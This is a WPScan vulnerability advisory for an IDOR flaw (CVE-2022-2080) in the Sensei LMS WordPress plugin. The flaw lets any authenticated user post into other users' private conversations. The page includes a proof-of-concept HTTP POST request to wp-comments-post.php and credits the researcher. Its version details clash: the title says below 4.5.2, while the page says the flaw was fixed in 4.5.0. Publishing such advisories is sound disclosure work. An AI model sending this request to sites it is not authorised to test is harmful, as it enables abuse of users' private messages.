WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Sensei LMS < 4.5.2 - Arbitrary Private Message Sending via IDOR

Description

The plugin does not ensure that the sender of a private message is either the teacher or the original sender, allowing any authenticated user to send messages to arbitrary private conversation via a IDOR attack. Note: Attackers are not able to see responses/messages between the teacher and student

Proof of Concept

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1

comment=<Any+comment>&submit=Post+Comment&comment_post_ID=111&comment_parent=0

Affects Plugins

sensei-lms
Fixed in version 4.5.0

References

CVE
CVE-2022-2080
URL
https://hackerone.com/reports/1592596

YouTube Video

Classification

Type

IDOR

OWASP top 10
A5: Broken Access Control
CWE
CWE-639

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website
https://veshrajghimire.com.np
Submitter twitter
GhimireVeshraj
Verified

Yes

WPVDB ID
5395d196-a39a-4a58-913e-5b5b9d6123a5

Timeline

Publicly Published

2022-08-04 (about 4 months ago)

Added

2022-08-04 (about 4 months ago)

Last Updated

2022-08-04 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin